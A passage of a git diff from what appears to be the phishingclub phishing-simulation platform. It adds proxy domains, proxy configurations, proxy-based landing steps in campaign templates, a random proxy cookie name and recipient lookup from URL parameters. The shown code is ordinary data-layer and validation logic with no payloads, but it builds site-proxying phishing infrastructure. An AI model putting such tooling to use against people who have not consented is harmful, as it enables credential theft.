nullable.NewNullableWithValue(row.ID) name := nullable.NewNullableWithValue(*vo.NewString255Must(row.Name)) + + // Handle domain type + domainType := row.Type + if domainType == "" { + domainType = "regular" + } + domainTypeValue := nullable.NewNullableWithValue(*vo.NewString32Must(domainType)) + + // Handle proxy target domain + proxyTargetDomain := nullable.NewNullableWithValue(*vo.NewOptionalString255Must(row.ProxyTargetDomain)) + managedTLS := nullable.NewNullableWithValue(row.ManagedTLSCerts) ownManagedTLS := nullable.NewNullableWithValue(row.OwnManagedTLS) hostWebsite := nullable.NewNullableWithValue(row.HostWebsite) @@ -275,6 +290,8 @@ func ToDomain(row *database.Domain) *model.Domain { CreatedAt: row.CreatedAt, UpdatedAt: row.UpdatedAt, Name: name, + Type: domainTypeValue, + ProxyTargetDomain: proxyTargetDomain, ManagedTLS: managedTLS, OwnManagedTLS: ownManagedTLS, HostWebsite: hostWebsite, @@ -282,21 +299,55 @@ func ToDomain(row *database.Domain) *model.Domain { PageNotFoundContent: staticNotFound, RedirectURL: redirectURL, CompanyID: companyID, + ProxyID: proxyID, Company: company, } } +// GetByProxyID gets domains by proxy ID +func (r *Domain) GetByProxyID( + ctx context.Context, + proxyID *uuid.UUID, + options *DomainOption, +) (*model.Result[model.Domain], error) { + result := model.NewEmptyResult[model.Domain]() + var dbDomains []database.Domain + db := r.DB + if options.WithCompany { + db = r.load(db) + } + db = db.Where("proxy_id = ?", proxyID) + dbRes := db.Find(&dbDomains) + + if dbRes.Error != nil { + return result, dbRes.Error + } + + for _, dbDomain := range dbDomains { + result.Rows = append(result.Rows, ToDomain(&dbDomain)) + } + return result, nil +} + // ToDomainSubset converts a domain subset from db row to model func ToDomainSubset(dbDomain *database.Domain) *model.DomainOverview { + domainType := dbDomain.Type + if domainType == "" { + domainType = "regular" + } + return &model.DomainOverview{ - ID: dbDomain.ID, - CreatedAt: dbDomain.CreatedAt, - UpdatedAt: dbDomain.UpdatedAt, - Name: dbDomain.Name, - HostWebsite: dbDomain.HostWebsite, - ManagedTLS: dbDomain.ManagedTLSCerts, - OwnManagedTLS: dbDomain.OwnManagedTLS, - RedirectURL: dbDomain.RedirectURL, - CompanyID: dbDomain.CompanyID, + ID: dbDomain.ID, + CreatedAt: dbDomain.CreatedAt, + UpdatedAt: dbDomain.UpdatedAt, + Name: dbDomain.Name, + Type: domainType, + ProxyTargetDomain: dbDomain.ProxyTargetDomain, + HostWebsite: dbDomain.HostWebsite, + ManagedTLS: dbDomain.ManagedTLSCerts, + OwnManagedTLS: dbDomain.OwnManagedTLS, + RedirectURL: dbDomain.RedirectURL, + CompanyID: dbDomain.CompanyID, + ProxyID: dbDomain.ProxyID, } } diff --git a/backend/repository/page.go b/backend/repository/page.go index 11c45ca..9832975 100644 --- a/backend/repository/page.go +++ b/backend/repository/page.go @@ -254,12 +254,34 @@ func ToPage(row *database.Page) (*model.Page, error) { } content := nullable.NewNullableWithValue(*c) + // Handle proxy fields + typeValue := row.Type + if typeValue == "" { + typeValue = "regular" + } + pageType := nullable.NewNullableWithValue(*vo.NewString32Must(typeValue)) + + targetURL, err := vo.NewOptionalString1024(row.TargetURL) + if err != nil { + return nil, errs.Wrap(err) + } + targetURLNullable := nullable.NewNullableWithValue(*targetURL) + + proxyConfig, err := vo.NewOptionalString1MB(row.ProxyConfig) + if err != nil { + return nil, errs.Wrap(err) + } + proxyConfigNullable := nullable.NewNullableWithValue(*proxyConfig) + return &model.Page{ - ID: id, - CreatedAt: row.CreatedAt, - UpdatedAt: row.UpdatedAt, - CompanyID: companyID, - Name: name, - Content: content, + ID: id, + CreatedAt: row.CreatedAt, + UpdatedAt: row.UpdatedAt, + CompanyID: companyID, + Name: name, + Content: content, + Type: pageType, + TargetURL: targetURLNullable, + ProxyConfig: proxyConfigNullable, }, nil } diff --git a/backend/repository/proxy.go b/backend/repository/proxy.go new file mode 100644 index 0000000..2c7d5ba --- /dev/null +++ b/backend/repository/proxy.go @@ -0,0 +1,299 @@ +package repository + +import ( + "context" + "fmt" + "strings" + + "github.com/google/uuid" + "github.com/oapi-codegen/nullable" + "github.com/phishingclub/phishingclub/database" + "github.com/phishingclub/phishingclub/errs" + "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/vo" + "gorm.io/gorm" +) + +var proxyAllowedColumns = assignTableToColumns(database.PROXY_TABLE, []string{ + "created_at", + "updated_at", + "name", + "start_url", +}) + +// ProxyOption is for eager loading +type ProxyOption struct { + Fields []string + *vo.QueryArgs + WithCompany bool +} + +// Proxy is a proxy repository +type Proxy struct { + DB *gorm.DB +} + +// load preloads the table relations +func (m *Proxy) load( + options *ProxyOption, + db *gorm.DB, +) *gorm.DB { + if options.WithCompany { + db = db.Joins("Company") + } + return db +} + +// Insert inserts a proxy +func (m *Proxy) Insert( + ctx context.Context, + proxy *model.Proxy, +) (*uuid.UUID, error) { + id := uuid.New() + row := proxy.ToDBMap() + row["id"] = id + AddTimestamps(row) + + res := m.DB. + Model(&database.Proxy{}). + Create(row) + + if res.Error != nil { + return nil, res.Error + } + return &id, nil +} + +// GetAll gets proxies +func (m *Proxy) GetAll( + ctx context.Context, + companyID *uuid.UUID, + options *ProxyOption, +) (*model.Result[model.Proxy], error) { + result := model.NewEmptyResult[model.Proxy]() + var dbProxies []database.Proxy + db := m.load(options, m.DB) + db = withCompanyIncludingNullContext(db, companyID, database.PROXY_TABLE) + db, err := useQuery(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + if options.Fields != nil { + fields := assignTableToColumns(database.PROXY_TABLE, options.Fields) + db = db.Select(strings.Join(fields, ",")) + } + dbRes := db. + Find(&dbProxies) + + if dbRes.Error != nil { + return result, dbRes.Error + } + + hasNextPage, err := useHasNextPage(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + result.HasNextPage = hasNextPage + + for _, dbProxy := range dbProxies { + proxy, err := ToProxy(&dbProxy) + if err != nil { + return result, errs.Wrap(err) + } + result.Rows = append(result.Rows, proxy) + } + return result, nil +} + +// GetAllSubset gets proxies with limited data +func (m *Proxy) GetAllSubset( + ctx context.Context, + companyID *uuid.UUID, + options *ProxyOption, +) (*model.Result[model.ProxyOverview], error) { + result := model.NewEmptyResult[model.ProxyOverview]() + var dbProxies []database.Proxy + db := withCompanyIncludingNullContext(m.DB, companyID, database.PROXY_TABLE) + db, err := useQuery(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + dbRes := db. + Select("id, created_at, updated_at, name, description, start_url, company_id"). + Find(&dbProxies) + + if dbRes.Error != nil { + return result, dbRes.Error + } + + hasNextPage, err := useHasNextPage(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + result.HasNextPage = hasNextPage + + for _, dbProxy := range dbProxies { + proxyOverview := model.ProxyOverview{ + ID: *dbProxy.ID, + CreatedAt: dbProxy.CreatedAt, + UpdatedAt: dbProxy.UpdatedAt, + Name: dbProxy.Name, + Description: dbProxy.Description, + StartURL: dbProxy.StartURL, + CompanyID: dbProxy.CompanyID, + } + result.Rows = append(result.Rows, &proxyOverview) + } + return result, nil +} + +// GetAllByCompanyID gets proxies by company id +func (m *Proxy) GetAllByCompanyID( + ctx context.Context, + companyID *uuid.UUID, + options *ProxyOption, +) (*model.Result[model.Proxy], error) { + result := model.NewEmptyResult[model.Proxy]() + var dbProxies []database.Proxy + db := m.load(options, m.DB) + db = whereCompany(db, database.PROXY_TABLE, companyID) + db, err := useQuery(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + if options.Fields != nil { + fields := assignTableToColumns(database.PROXY_TABLE, options.Fields) + db = db.Select(strings.Join(fields, ",")) + } + dbRes := db. + Find(&dbProxies) + + if dbRes.Error != nil { + return result, dbRes.Error + } + + hasNextPage, err := useHasNextPage(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + result.HasNextPage = hasNextPage + + for _, dbProxy := range dbProxies { + proxy, err := ToProxy(&dbProxy) + if err != nil { + return result, errs.Wrap(err) + } + result.Rows = append(result.Rows, proxy) + } + return result, nil +} + +// GetByID gets proxy by id +func (m *Proxy) GetByID( + ctx context.Context, + id *uuid.UUID, + options *ProxyOption, +) (*model.Proxy, error) { + dbProxy := database.Proxy{} + db := m.load(options, m.DB) + result := db. + Where(TableColumnID(database.PROXY_TABLE)+" = ?", id). + First(&dbProxy) + + if result.Error != nil { + return nil, result.Error + } + return ToProxy(&dbProxy) +} + +// GetByNameAndCompanyID gets proxy by name +func (m *Proxy) GetByNameAndCompanyID( + ctx context.Context, + name *vo.String64, + companyID *uuid.UUID, // can be null + options *ProxyOption, +) (*model.Proxy, error) { + proxy := database.Proxy{} + db := m.load(options, m.DB) + db = withCompanyIncludingNullContext(db, companyID, database.PROXY_TABLE) + result := db. + Where( + fmt.Sprintf( + "%s = ?", + TableColumn(database.PROXY_TABLE, "name"), + ), + name.String(), + ). + First(&proxy) + + if result.Error != nil { + return nil, result.Error + } + return ToProxy(&proxy) +} + +// UpdateByID updates a proxy by id +func (m *Proxy) UpdateByID( + ctx context.Context, + id *uuid.UUID, + proxy *model.Proxy, +) error { + row := proxy.ToDBMap() + AddUpdatedAt(row) + res := m.DB. + Model(&database.Proxy{}). + Where("id = ?", id). + Updates(row) + + if res.Error != nil { + return res.Error + } + return nil +} + +// DeleteByID deletes a proxy by id +func (m *Proxy) DeleteByID( + ctx context.Context, + id *uuid.UUID, +) error { + result := m.DB.Delete(&database.Proxy{}, id) + + if result.Error != nil { + return result.Error + } + return nil +} + +func ToProxy(row *database.Proxy) (*model.Proxy, error) { + id := nullable.NewNullableWithValue(*row.ID) + companyID := nullable.NewNullNullable[uuid.UUID]() + if row.CompanyID != nil { + companyID.Set(*row.CompanyID) + } + name := nullable.NewNullableWithValue(*vo.NewString64Must(row.Name)) + + description, err := vo.NewOptionalString1024(row.Description) + if err != nil { + return nil, errs.Wrap(err) + } + descriptionNullable := nullable.NewNullableWithValue(*description) + + startURL := nullable.NewNullableWithValue(*vo.NewString1024Must(row.StartURL)) + + proxyConfig, err := vo.NewString1MB(row.ProxyConfig) + if err != nil { + return nil, errs.Wrap(err) + } + proxyConfigNullable := nullable.NewNullableWithValue(*proxyConfig) + + return &model.Proxy{ + ID: id, + CreatedAt: row.CreatedAt, + UpdatedAt: row.UpdatedAt, + CompanyID: companyID, + Name: name, + Description: descriptionNullable, + StartURL: startURL, + ProxyConfig: proxyConfigNullable, + }, nil +} diff --git a/backend/seed/migrate.go b/backend/seed/migrate.go index d54aeed..25f43df 100644 --- a/backend/seed/migrate.go +++ b/backend/seed/migrate.go @@ -1,6 +1,8 @@ package seed import ( + "crypto/rand" + "github.com/go-errors/errors" "github.com/google/uuid" "github.com/phishingclub/phishingclub/app" @@ -34,6 +36,7 @@ func initialInstallAndSeed( &database.RecipientGroupRecipient{}, &database.Domain{}, &database.Page{}, + &database.Proxy{}, &database.SMTPHeader{}, &database.SMTPConfiguration{}, &database.Email{}, @@ -51,16 +54,33 @@ func initialInstallAndSeed( &database.Identifier{}, &database.CampaignStats{}, } + + // disable foreign key constraints temporarily for sqlite to allow table recreation + logger.Debug("disabling foreign key constraints for migration") + err := db.Exec("PRAGMA foreign_keys = OFF").Error + if err != nil { + return errs.Wrap(errors.Errorf("failed to disable foreign keys: %w", err)) + } + // create tables logger.Debug("migrating tables") - err := db.AutoMigrate( + err = db.AutoMigrate( tables..., ) if err != nil { + // re-enable foreign keys before returning error + db.Exec("PRAGMA foreign_keys = ON") return errs.Wrap( errors.Errorf("failed to migrate database: %w", err), ) } + + // re-enable foreign key constraints + logger.Debug("re-enabling foreign key constraints after migration") + err = db.Exec("PRAGMA foreign_keys = ON").Error + if err != nil { + return errs.Wrap(errors.Errorf("failed to re-enable foreign keys: %w", err)) + } for _, table := range tables { t, ok := table.(database.Migrater) if !ok { @@ -244,6 +264,40 @@ func SeedSettings( } } } + { + // seed proxy cookie name + id := uuid.New() + var c int64 + res := db. + Model(&database.Option{}). + Where("key = ?", data.OptionKeyProxyCookieName). + Count(&c) + + if res.Error != nil { + return errs.Wrap(res.Error) + } + if c == 0 { + // generate random 8-character cookie name + b := make([]byte, 8) + _, err := rand.Read(b) + if err != nil { + return errs.Wrap(err) + } + charset := "abcdefghijklmnopqrstuvwxyz" + cookieName := "" + for i := range b { + cookieName += string(charset[int(b[i])%len(charset)]) + } + res = db.Create(&database.Option{ + ID: &id, + Key: data.OptionKeyProxyCookieName, + Value: cookieName, + }) + if res.Error != nil { + return errs.Wrap(res.Error) + } + } + } return nil } diff --git a/backend/server/shared.go b/backend/server/shared.go new file mode 100644 index 0000000..4dea6bd --- /dev/null +++ b/backend/server/shared.go @@ -0,0 +1,58 @@ +package server + +import ( + "context" + "net/http" + + "github.com/google/uuid" + "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/repository" +) + +// GetCampaignRecipientFromURLParams extracts campaign recipient information from URL parameters +// by checking all identifiers against query parameters and finding the first matching campaign recipient. +// returns the campaign recipient object, parameter name, and any error encountered. +func GetCampaignRecipientFromURLParams( + ctx context.Context, + req *http.Request, + identifierRepo *repository.Identifier, + campaignRecipientRepo *repository.CampaignRecipient, +) (*model.CampaignRecipient, string, error) { + // get all identifiers + identifiers, err := identifierRepo.GetAll(ctx, &repository.IdentifierOption{}) + if err != nil { + return nil, "", err + } + + query := req.URL.Query() + var matchingParams []struct { + name string + id *uuid.UUID + } + + // collect all query parameters that match identifier names and can be parsed as UUIDs + for _, identifier := range identifiers.Rows { + if name := identifier.Name.MustGet(); query.Has(name) { + if id, err := uuid.Parse(query.Get(name)); err == nil { + matchingParams = append(matchingParams, struct { + name string + id *uuid.UUID + }{name: name, id: &id}) + } + } + } + + if len(matchingParams) == 0 { + return nil, "", nil + } + + // check each matching parameter to find a valid campaign recipient + for _, param := range matchingParams { + campaignRecipient, err := campaignRecipientRepo.GetByCampaignRecipientID(ctx, param.id) + if err == nil && campaignRecipient != nil { + return campaignRecipient, param.name, nil + } + } + + return nil, "", nil +} diff --git a/backend/service/campaignTemplate.go b/backend/service/campaignTemplate.go index f1be7a1..a1f4995 100644 --- a/backend/service/campaignTemplate.go +++ b/backend/service/campaignTemplate.go @@ -587,24 +587,51 @@ func (c *CampaignTemplate) UpdateByID( if campaignTemplate.BeforeLandingPageID.IsSpecified() { if v, err := campaignTemplate.BeforeLandingPageID.Get(); err == nil { incoming.BeforeLandingPageID.Set(v) + incoming.BeforeLandingProxyID.SetNull() // clear proxy if page is set } else { incoming.BeforeLandingPageID.SetNull() } } + if campaignTemplate.BeforeLandingProxyID.IsSpecified() { + if v, err := campaignTemplate.BeforeLandingProxyID.Get(); err == nil { + incoming.BeforeLandingProxyID.Set(v) + incoming.BeforeLandingPageID.SetNull() // clear page if proxy is set + } else { + incoming.BeforeLandingProxyID.SetNull() + } + } if campaignTemplate.LandingPageID.IsSpecified() { if v, err := campaignTemplate.LandingPageID.Get(); err == nil { incoming.LandingPageID.Set(v) + incoming.LandingProxyID.SetNull() // clear proxy if page is set } else { incoming.LandingPageID.SetNull() } } + if campaignTemplate.LandingProxyID.IsSpecified() { + if v, err := campaignTemplate.LandingProxyID.Get(); err == nil { + incoming.LandingProxyID.Set(v) + incoming.LandingPageID.SetNull() // clear page if proxy is set + } else { + incoming.LandingProxyID.SetNull() + } + } if campaignTemplate.AfterLandingPageID.IsSpecified() { if v, err := campaignTemplate.AfterLandingPageID.Get(); err == nil { incoming.AfterLandingPageID.Set(v) + incoming.AfterLandingProxyID.SetNull() // clear proxy if page is set } else { incoming.AfterLandingPageID.SetNull() } } + if campaignTemplate.AfterLandingProxyID.IsSpecified() { + if v, err := campaignTemplate.AfterLandingProxyID.Get(); err == nil { + incoming.AfterLandingProxyID.Set(v) + incoming.AfterLandingPageID.SetNull() // clear page if proxy is set + } else { + incoming.AfterLandingProxyID.SetNull() + } + } if campaignTemplate.AfterLandingPageRedirectURL.IsSpecified() { if v, err := campaignTemplate.AfterLandingPageRedirectURL.Get(); err == nil { incoming.AfterLandingPageRedirectURL.Set(v) @@ -704,3 +731,76 @@ func (c *CampaignTemplate) DeleteByID( c.AuditLogAuthorized(ae) return nil } + +// RemoveProxiesByProxyID removes the Proxy ID from templates +func (c *CampaignTemplate) RemoveProxiesByProxyID( + ctx context.Context, + session *model.Session, + proxyID *uuid.UUID, +) error { + ae := NewAuditEvent("CampaignTemplate.RemoveProxiesByProxyID", session) + ae.Details["proxyId"] = proxyID.String() + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + c.LogAuthError(err) + return err + } + if !isAuthorized { + c.AuditLogNotAuthorized(ae) + return errs.ErrAuthorizationFailed + } + + // get all templates that use this proxy + templatesAffected, err := c.CampaignTemplateRepository.GetByProxyID( + ctx, + proxyID, + &repository.CampaignTemplateOption{}, + ) + if err != nil { + c.Logger.Errorw("failed to get affected campaign templates", "error", err) + return err + } + + // get all campaigns using these templates and close active ones + templateIDs := []*uuid.UUID{} + for _, t := range templatesAffected { + id := t.ID.MustGet() + templateIDs = append(templateIDs, &id) + } + + if len(templateIDs) > 0 { + campaignsAffected, err := c.CampaignRepository.GetByTemplateIDs(ctx, templateIDs) + if err != nil { + c.Logger.Errorw("failed to get affected campaigns by template IDs", "error", err) + return err + } + + for _, campaign := range campaignsAffected { + if !campaign.IsActive() { + continue + } + err := campaign.Close() + if err != nil { + c.Logger.Errorw("failed to close campaign", "error", err) + } + campaignID := campaign.ID.MustGet() + err = c.CampaignRepository.UpdateByID( + ctx, + &campaignID, + campaign, + ) + if err != nil { + c.Logger.Errorw("failed to update closed campaign", "error", err) + } + } + } + + // remove the Proxy id from the templates + err = c.CampaignTemplateRepository.RemoveProxyIDFromAll(ctx, proxyID) + if err != nil { + c.Logger.Errorw("failed to remove Proxy ID from all campaign templates", "error", err) + return err + } + return nil +} diff --git a/backend/service/domain.go b/backend/service/domain.go index 06c1891..2ce4e1a 100644 --- a/backend/service/domain.go +++ b/backend/service/domain.go @@ -7,6 +7,7 @@ import ( "fmt" "net" "net/http" + "strings" "time" "github.com/go-errors/errors" @@ -39,11 +40,49 @@ type Domain struct { TemplateService *Template } +// CreateProxyDomain creates a proxy domain bypassing direct creation restrictions +func (d *Domain) CreateProxyDomain( + ctx context.Context, + session *model.Session, + domain *model.Domain, +) (*uuid.UUID, error) { + return d.createDomain(ctx, session, domain, true) +} + // Create creates a new domain func (d *Domain) Create( ctx context.Context, session *model.Session, domain *model.Domain, +) (*uuid.UUID, error) { + return d.createDomain(ctx, session, domain, false) +} + +// DeleteProxyDomain deletes a proxy domain bypassing direct deletion restrictions +func (d *Domain) DeleteProxyDomain( + ctx context.Context, + session *model.Session, + id *uuid.UUID, +) error { + return d.deleteDomain(ctx, session, id, true) +} + +// UpdateProxyDomain updates a proxy domain bypassing direct update restrictions +func (d *Domain) UpdateProxyDomain( + ctx context.Context, + session *model.Session, + id *uuid.UUID, + incoming *model.Domain, +) error { + return d.updateDomain(ctx, session, id, incoming, true) +} + +// createDomain is the internal domain creation method +func (d *Domain) createDomain( + ctx context.Context, + session *model.Session, + domain *model.Domain, + allowProxyCreation bool, ) (*uuid.UUID, error) { ae := NewAuditEvent("Domain.Create", session) // check permissions @@ -56,22 +95,40 @@ func (d *Domain) Create( d.AuditLogNotAuthorized(ae) return nil, errs.ErrAuthorizationFailed } - // validate data - if err := domain.Validate(); err != nil { - // d.Logger.Debugf("failed to validate domain", "error", err) - return nil, errs.Wrap(err) - } - // validate template content if present - if pageContent, err := domain.PageContent.Get(); err == nil { - if err := d.TemplateService.ValidateDomainTemplate(pageContent.String()); err != nil { - d.Logger.Errorw("failed to validate domain page template", "error", err) - return nil, validate.WrapErrorWithField(errors.New("invalid page template: "+err.Error()), "pageContent") + // prevent direct creation of proxy domains unless explicitly allowed + if !allowProxyCreation { + if domainType, err := domain.Type.Get(); err == nil && domainType.String() == "proxy" { + return nil, validate.WrapErrorWithField(errors.New("proxy domains can only be created through proxy configuration, not directly"), "type") } } - if notFoundContent, err := domain.PageNotFoundContent.Get(); err == nil { - if err := d.TemplateService.ValidateDomainTemplate(notFoundContent.String()); err != nil { - d.Logger.Errorw("failed to validate domain not found template", "error", err) - return nil, validate.WrapErrorWithField(errors.New("invalid not found template: "+err.Error()), "pageNotFoundContent") + + // validate data + if err := domain.Validate(); err != nil { + d.Logger.Errorw("failed to validate domain", "error", err) + return nil, errs.Wrap(err) + } + + // get domain type for specific validation + domainType, _ := domain.Type.Get() + + if domainType.String() == "proxy" { + // validate proxy target domain + if err := d.validateProxyDomain(ctx, domain); err != nil { + return nil, err + } + } else { + // validate template content for regular domains + if pageContent, err := domain.PageContent.Get(); err == nil { + if err := d.TemplateService.ValidateDomainTemplate(pageContent.String()); err != nil { + d.Logger.Errorw("failed to validate domain page template", "error", err) + return nil, validate.WrapErrorWithField(errors.New("invalid page template: "+err.Error()), "pageContent") + } + } + if notFoundContent, err := domain.PageNotFoundContent.Get(); err == nil { + if err := d.TemplateService.ValidateDomainTemplate(notFoundContent.String()); err != nil { + d.Logger.Errorw("failed to validate domain not found template", "error", err) + return nil, validate.WrapErrorWithField(errors.New("invalid not found template: "+err.Error()), "pageNotFoundContent") + } } } // check for uniqueness @@ -365,6 +422,17 @@ func (d *Domain) UpdateByID( session *model.Session, id *uuid.UUID, incoming *model.Domain, +) error { + return d.updateDomain(ctx, session, id, incoming, false) +} + +// updateDomain is the internal domain update method +func (d *Domain) updateDomain( + ctx context.Context, + session *model.Session, + id *uuid.UUID, + incoming *model.Domain, + allowProxyUpdate bool, ) error { ae := NewAuditEvent("Domain.UpdateByID", session) ae.Details["id"] = id.String() @@ -392,7 +460,78 @@ func (d *Domain) UpdateByID( d.Logger.Errorw("failed to update domain", "error", err) return err } + + // check if this is a proxy domain and restrict editable fields + isProxyDomain := false + if domainType, err := current.Type.Get(); err == nil && domainType.String() == "proxy" { + isProxyDomain = true + // for proxy domains, only allow updating ManagedTLS and custom certificate fields + if incoming.Type.IsSpecified() { + incomingType, _ := incoming.Type.Get() + if incomingType.String() != "proxy" { + return validate.WrapErrorWithField(errors.New("cannot change type of proxy domain"), "type") + } + } + } else { + // prevent changing regular domains to proxy type + if incoming.Type.IsSpecified() { + incomingType, _ := incoming.Type.Get() + if incomingType.String() == "proxy" { + return validate.WrapErrorWithField(errors.New("cannot change domain to proxy type - proxy domains can only be created through proxy configuration"), "type") + } + } + } + // set the supplied field on the existing domain + if isProxyDomain && !allowProxyUpdate { + // for proxy domains, prevent changing proxy-specific fields unless explicitly allowed + if incoming.ProxyTargetDomain.IsSpecified() { + return validate.WrapErrorWithField(errors.New("cannot change proxy target domain - edit the proxy configuration instead"), "proxyTargetDomain") + } + if incoming.HostWebsite.IsSpecified() { + return validate.WrapErrorWithField(errors.New("cannot change host website setting for proxy domain"), "hostWebsite") + } + if incoming.PageContent.IsSpecified() { + return validate.WrapErrorWithField(errors.New("cannot change page content for proxy domain"), "pageContent") + } + if incoming.PageNotFoundContent.IsSpecified() { + return validate.WrapErrorWithField(errors.New("cannot change page not found content for proxy domain"), "pageNotFoundContent") + } + if incoming.RedirectURL.IsSpecified() { + return validate.WrapErrorWithField(errors.New("cannot change redirect URL for proxy domain"), "redirectURL") + } + } else { + // for regular domains or proxy domains with allowed updates, allow updating all fields + if v, err := incoming.Type.Get(); err == nil { + current.Type.Set(v) + } + if v, err := incoming.ProxyTargetDomain.Get(); err == nil { + current.ProxyTargetDomain.Set(v) + } + if v, err := incoming.HostWebsite.Get(); err == nil { + current.HostWebsite.Set(v) + } + if v, err := incoming.PageContent.Get(); err == nil { + // validate template content before updating + if err := d.TemplateService.ValidateDomainTemplate(v.String()); err != nil { + d.Logger.Errorw("failed to validate domain page template", "error", err) + return validate.WrapErrorWithField(errors.New("invalid page template: "+err.Error()), "pageContent") + } + current.PageContent.Set(v) + } + if v, err := incoming.PageNotFoundContent.Get(); err == nil { + // validate template content before updating + if err := d.TemplateService.ValidateDomainTemplate(v.String()); err != nil { + d.Logger.Errorw("failed to validate domain not found template", "error", err) + return validate.WrapErrorWithField(errors.New("invalid not found template: "+err.Error()), "pageNotFoundContent") + } + current.PageNotFoundContent.Set(v) + } + if v, err := incoming.RedirectURL.Get(); err == nil { + current.RedirectURL.Set(v) + } + } + wasManagedTLS := current.ManagedTLS.MustGet() if v, err := incoming.ManagedTLS.Get(); err == nil { current.ManagedTLS.Set(v) @@ -413,33 +552,33 @@ func (d *Domain) UpdateByID( current.OwnManagedTLSPem.Set(v) ownManagedTLSPemIsSet = len(v) > 0 } - if v, err := incoming.HostWebsite.Get(); err == nil { - current.HostWebsite.Set(v) - } - if v, err := incoming.PageContent.Get(); err == nil { - // validate template content before updating - if err := d.TemplateService.ValidateDomainTemplate(v.String()); err != nil { - d.Logger.Errorw("failed to validate domain page template", "error", err) - return validate.WrapErrorWithField(errors.New("invalid page template: "+err.Error()), "pageContent") - } - current.PageContent.Set(v) - } - if v, err := incoming.PageNotFoundContent.Get(); err == nil { - // validate template content before updating - if err := d.TemplateService.ValidateDomainTemplate(v.String()); err != nil { - d.Logger.Errorw("failed to validate domain not found template", "error", err) - return validate.WrapErrorWithField(errors.New("invalid not found template: "+err.Error()), "pageNotFoundContent") - } - current.PageNotFoundContent.Set(v) - } - if v, err := incoming.RedirectURL.Get(); err == nil { - current.RedirectURL.Set(v) - } + // validate if err := current.Validate(); err != nil { d.Logger.Errorw("failed to validate domain", "error", err) return err } + + // validate proxy domain if type is proxy + if domainType, err := current.Type.Get(); err == nil && domainType.String() == "proxy" { + if err := d.validateProxyDomain(ctx, current); err != nil { + return err + } + } else { + // validate template content for regular domains only + if pageContent, err := current.PageContent.Get(); err == nil { + if err := d.TemplateService.ValidateDomainTemplate(pageContent.String()); err != nil { + d.Logger.Errorw("failed to validate domain page template", "error", err) + return validate.WrapErrorWithField(errors.New("invalid page template: "+err.Error()), "pageContent") + } + } + if notFoundContent, err := current.PageNotFoundContent.Get(); err == nil { + if err := d.TemplateService.ValidateDomainTemplate(notFoundContent.String()); err != nil { + d.Logger.Errorw("failed to validate domain not found template", "error", err) + return validate.WrapErrorWithField(errors.New("invalid not found template: "+err.Error()), "pageNotFoundContent") + } + } + } // clean up if TLS was previous managed but no longer is if managedTLS, err := incoming.ManagedTLS.Get(); err == nil && !managedTLS { if wasManagedTLS { @@ -491,11 +630,21 @@ func (d *Domain) UpdateByID( return nil } -// DeleteByID +// DeleteByID deletes a domain by ID func (d *Domain) DeleteByID( ctx context.Context, session *model.Session, id *uuid.UUID, +) error { + return d.deleteDomain(ctx, session, id, false) +} + +// deleteDomain is the internal domain deletion method +func (d *Domain) deleteDomain( + ctx context.Context, + session *model.Session, + id *uuid.UUID, + allowProxyDeletion bool, ) error { ae := NewAuditEvent("Domain.DeleteByID", session) ae.Details["id"] = id.String() @@ -509,6 +658,24 @@ func (d *Domain) DeleteByID( d.AuditLogNotAuthorized(ae) return errs.ErrAuthorizationFailed } + + // get the domain to check if it's a proxy domain + current, err := d.DomainRepository.GetByID(ctx, id, &repository.DomainOption{}) + if errors.Is(err, gorm.ErrRecordNotFound) { + d.Logger.Debugw("domain not found", "error", err) + return err + } + if err != nil { + d.Logger.Errorw("failed to get domain for deletion", "error", err) + return err + } + + // prevent deletion of proxy domains unless explicitly allowed + if !allowProxyDeletion { + if domainType, err := current.Type.Get(); err == nil && domainType.String() == "proxy" { + return validate.WrapErrorWithField(errors.New("proxy domains can only be deleted by deleting the associated proxy configuration"), "domain") + } + } // get the domain domain, err := d.DomainRepository.GetByID( ctx, @@ -696,3 +863,105 @@ func (d *Domain) removeOwnManagedTLS( } return nil } + +// validateProxyDomain validates proxy domain configuration +func (d *Domain) validateProxyDomain(ctx context.Context, domain *model.Domain) error { + // validate proxy target domain format + proxyTargetDomain, err := domain.ProxyTargetDomain.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("proxy target domain is required for proxy domains"), "proxyTargetDomain") + } + + targetDomainStr := proxyTargetDomain.String() + if targetDomainStr == "" { + return validate.WrapErrorWithField(errors.New("proxy target domain cannot be empty"), "proxyTargetDomain") + } + + // validate proxy target format - can be full URL or domain + if strings.Contains(targetDomainStr, "://") { + // full URL format - basic validation + if !strings.HasPrefix(targetDomainStr, "http://") && !strings.HasPrefix(targetDomainStr, "https://") { + return validate.WrapErrorWithField(errors.New("proxy target domain URL must start with http:// or https://"), "proxyTargetDomain") + } + } else { + // domain-only format - validate as domain + if !isValidDomain(targetDomainStr) { + return validate.WrapErrorWithField(errors.New("invalid domain format for proxy target domain"), "proxyTargetDomain") + } + } + + return nil +} + +// isValidDomain performs basic domain name validation +func isValidDomain(domain string) bool { + // basic checks - must have at least one dot and valid characters + if len(domain) == 0 || len(domain) > 253 { + return false + } + + // must contain at least one dot + if !strings.Contains(domain, ".") { + return false + } + + // cannot start or end with dash or dot + if strings.HasPrefix(domain, "-") || strings.HasSuffix(domain, "-") || + strings.HasPrefix(domain, ".") || strings.HasSuffix(domain, ".") { + return false + } + + // check each label + labels := strings.Split(domain, ".") + for _, label := range labels { + if len(label) == 0 || len(label) > 63 { + return false + } + + // label cannot start or end with dash + if strings.HasPrefix(label, "-") || strings.HasSuffix(label, "-") { + return false + } + + // basic character check - alphanumeric and dash only + for _, char := range label { + if !((char >= 'a' && char <= 'z') || (char >= 'A' && char <= 'Z') || + (char >= '0' && char <= '9') || char == '-') { + return false + } + } + 